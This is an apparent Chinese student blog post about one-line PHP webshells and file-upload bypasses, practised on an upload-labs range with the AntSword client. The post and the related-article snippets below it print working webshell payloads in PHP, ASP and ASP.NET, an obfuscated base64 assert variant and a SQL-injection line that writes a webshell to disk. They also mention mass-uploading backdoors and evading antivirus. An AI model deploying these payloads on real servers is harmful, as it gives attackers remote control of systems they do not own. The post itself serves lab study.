一句话木马及文件上传。

最新推荐文章于 2024-07-07 16:36:31 发布
最新推荐文章于 2024-07-07 16:36:31 发布
阅读量5.3k 收藏 17
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhong_yan/article/details/121020898
版权

前言,本博客只用于记录,不用于参考,并且并非真实的网站,而是搭建的靶场。

(要是学长看了我的博客的话,能不能告诉我咱学校的网站有没有后门什么的(划掉),传授一些经验。)

第一步:文件上传靶场upload-labs搭建

首先,启动PHP_study.(什么,不知道,不会上网查吗。zhong_yan博主,你可真是个废物)

 将upload-labs-master拖拽至WWW(PHP_study)目录(本博客只是记录,并非参考)

 之后启动,就上面的那张图片(阿帕奇就可以了)

访问靶场,便搭建成功了

ps:以后可以用docker搭建靶场(ctf里面做的题目就是用这个靶场搭建的) 

 第二步:一句话木马(webshell)原理

webshell就是以asp、php、jsp、或者cgj等网页形式存在的一种命令执行环境,也可以称其为一种网页后门。

下面是一句话木马(PHP语言编写(记得学))

<?php @eval($_post['pass']);?>

php代码需要使用<?php?>括起来,服务器才能将其识别为PHP代码

@符号表示不报错,即使执行错误,也不会报错

密码为pass

Eval()函数

我们用上面这个代码来黑一下搭建的靶场。

先把以上的代码放到这里面

 之后访问(自己搭建的靶场)。

然后打开蚁剑。添加(自己搭建的靶场)

 之后双击,就可以进入靶场的内部了

 

<?php $ant=base64_decode("YXNzZXJ0");$ant($_post['ant']));?>

3、中国蚁剑(AntSword)安装使用

GitHub - AntSwordProject/AntSword-Loader: AntSword 加载器icon-default.png?t=L9C2https://github.com/AntSwordProject/AntSword-Loader在这里下载,根据自己的电脑进行下载。

 下载完解压即可寻找使用。

4、 文件上传前端绕过

 5、实战操练

 

 

 把onsubmit给干掉,就没人拦截提交了(emm)

访问图片链接,就成功了。 

zhong_yan
关注
  • 0
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传一句话木马getshell
qq_41620273的博客
12-25 5615
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
php一句话木马连菜刀,如何基于菜刀PHP一句话实现单个文件批量上传?
weixin_35741494的博客
03-09 1923
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见...
文件上传一句话木马
kami_kami的博客
01-17 842
先写好一句话木马()(可先用记事本写,后将后缀改为php),想办法将这个php文件上传到需要入侵的网站,上传成功后,打开蚁剑,新建数据,将网站的URL网址粘贴进去,再填入密码(上面木马的[]中的1即为密码,可自己设定),后点测试连接,成功后点添加。然后双击添加的数据即可访问网站对应的服务器,在其中可找到flag(一般在根目录下,根目录就是\)
[SWPUCTF 2021 新生赛]caidao(一句话木马+蚁剑)
2401_84499442的博客
07-07 193
第一种方法:直接post传参,首先eval函数是代码执行,那么我们就写入wllm=system('ls /'),查看服务器文件目录。很明显,这里的flag就是我们要找的文件,然后再执行wllm=system('cat /flag'),查看flag文件内容。当然,很明显,这里是一句话木马,那么我们也可以用蚁剑。第一步,因为他已经给出了密码“wllm”,那么我们就直接连接。然后从下往上依次查找文件,最终在/flga中找到flag。
文件上传漏洞------一句话木马原理解析
m0_69151365的博客
03-11 2275
这是一个最简单的一句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上一个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是一句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
上传文件注入(附带一句话木马)
m0_50818626的博客
05-27 942
发现order by 6的时候还是正常的,当order by 7 的时候却出现问题了,判断字段数有6个。跟上'之后 没有输出了,而跟上 -- qwe 将后面注释掉以后又恢复正常了,判断此处为注入点。这里的URL地址就是咱们上传的一句话木马php文件的地址,密码就是我们POST上传的参数。>就是我们上传的一句话木马啦。如上图所示,有很明显的传参地点,我们选择在id=13后面跟一个'判断是否有注入点。到我们最关键的一步了,我们在输出位上跟上以下语句。我们就可以对对方的数据库为所欲为啦。四、上传一句话木马
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
qq_53058639的博客
03-16 1630
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
上传一句话木马拿shell教程
mad-coding Blog
03-21 1万+
0x00 前言 一句话木马: <?php @eval($_POST['pass']);?> ASP: <%eval request("pass")%> ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 原理: php的...
文件上传+一句话木马(图文学习笔记)
qq_43236906的博客
10-24 4264
文件上传+一句话木马(学习笔记) 漏洞描述 文件上传漏洞是指一些web应用程序中允许上传文本或其他指定资源到指定位置,上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。(摘自百度搜索) 例如有一个网站会出现以下的操作让其上传文件等,可利用上传文件过滤不严谨来插入木马等。 一句话木马 以PHP举例 <?php @eval($_POST['muma']); ?> eval()函数表示括号内的语句字符串什么的全都
除了文件上传还有哪些方式可以写一句话木马
qq_51553814的博客
11-29 2315
除了文件上传还有哪些方式可以写一句话木马一句话木马如果上传到服务器的话,有啥危害学过网络安全的人都知道。但是通常网上流传的方式都是通过文件上传来实现木马上传,实在太过老套,这里就教大家几个新的方式来本地生成一句话木马。(这篇笔记知识带大家入个门,想了解的话还得自己查询资料来学习) 这篇笔记也是有很多跳转内容,看不懂可以尝试看看跳转的博客,他们写的一定是比我更好 结合sql注入生成一句话木马 讲这之前得先介绍mysql配置文件中的secure_file_priv选项 secure_file_priv配置
java一句话木马_如何使用JSP一句话木马和菜刀木马
weixin_39782545的博客
02-16 4303
展开全部相信用过一句话木马的黑阔们对中国32313133353236313431303231363533e4b893e5b19e31333337393033菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使...
一句话木马上传常见的几种方法
热门推荐
YidaHu的博客
01-06 3万+
1,利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。 假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg ,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将lubr.php.
一句话木马
qq_43814486的博客
04-22 2380
条件:1.有服务器的写入权限。2.知道服务器的地址。目的:将我们的一句话木马插入到服务器的asp文件中。 例如:在服务器的地址里创建一个叫virus.php文件里边放代码: <?php system($_GET['cmd'])?> 然后我们就可以通过URL去操控服务器的cmd了,例如访问: http://127.0.0.1/virus.php?cmd=ipconfig 相当于在服...
上传漏洞-一句话木马
Coisini的博客
05-30 8497
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容: 一句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入一句话木马,然后你就可以在本地通过...
使用Weevely工具上传一句话木马
一颗小松子.的博客
01-27 3097
Weevely在上传木马进行后渗透测试的过程中可用于模拟一个类似于telnet的连接shell 通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理 Weevely生成的服务器端php代码经过了base64编码,可以绕过主流的杀毒软件和IDS 上传服务器端代码后通常可以通过weevely直接运行 使用它可以浏览文件系统,检测服务器设置,创建tcpshell和reverse shell。
【用一句话木马文件上传漏洞挖掘实战】
m0_68563451的博客
03-03 1213
6.使用AntSword(中国蚁剑)管理工具连接一句话,注意连接密码就是一句话里的值。5.成功将一句话木马作为头像上传,右键点击查看图像,可以拿到图片路径。3.点击上传头像,将一句话木马改为图片形式上传,并开启bp抓包。4.在抓包代码中将".jpg"改为".php",返回抓包结果。#用一句话木马文件上传漏洞挖掘实战。1.点击新用户注册,注册一个用户。2.注册成功后点击我的个人资料。打开火狐浏览器,访问目标地址。
上传一句话木马Upload-Labs 1-5全图
4pri1
03-20 443
第一关 上传一句话木马Upload-Labs 1-5全图 第一关 客户端利用js检测,检测的通常是后缀名,只要在bp改回后缀即可绕过 蚁剑连接即可 第二关 服务端mime类检测,检测的是content-type的内容,所以绕过可以在bp修改content-type的值image/gif 放包,蚁剑连接即可 第三关. 用第一关的绕过方式就不行了 三种方法 通过上传不受欢迎的php扩展来绕过黑名单。例如:pht,phpt,phtml,php3.
Web_文件上传1_一句话木马(DAY6)
CHUNJIUJUN的博客
08-02 345
找注入点,判断类型,确认回显点后写入一句木马连接蚁剑 ?id=32 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,"<?php eval($_POST['jm']);?>",12,13,14,15 into outfile "/var/www/html/jm.php" 查询一下jm.php是否已经上传 右键添加数据 把我们上传的地址写上去,连接密码是我们一句话木马上自己设置的,为js 点添加,然..
黑客小白进阶之路——文件上传一句话木马
Hacker_by_V的博客
08-27 1265
一句话木马原理 什么是一句话木马? Webshell:webshell就是以网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门,顾名思义,web的含义是显然需要服务器开放web服务,shell的含义是取得对服务器某种程度上的操作权限。 Webshell通常被叫做入侵者通过网站端口对网站服务器的某种程度上操作的权限,由于webshell大多数是以动态脚本的形式出现,也有人称之为网站的后门工具,一句话木马、大马、小马都可以叫webshell。 而我们的一句话木马只需要一行代码的木马,短短的一行代码
一句话木马文件上传漏洞
最新发布
07-20
一句话木马文件上传漏洞,通常发生在网站的文件上传功能中,攻击者可以利用这个漏洞上传恶意脚本(如PHP、JavaScript或HTML等),伪装成普通用户提交的正常文件。当其他用户或系统访问包含这种恶意脚本的文件时,可能会被执行,导致未经授权的操作,比如数据窃取、系统控制等。 这种漏洞往往源于开发者的安全意识不足,未能对上传的文件内容进行充分验证和限制,使得攻击者能够绕过正常的文件类型检查。修复这类漏洞的关键在于实施严格的文件类型验证、大小限制,并进行必要的安全编码实践,例如对上传的文件内容进行解码、解析和清理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值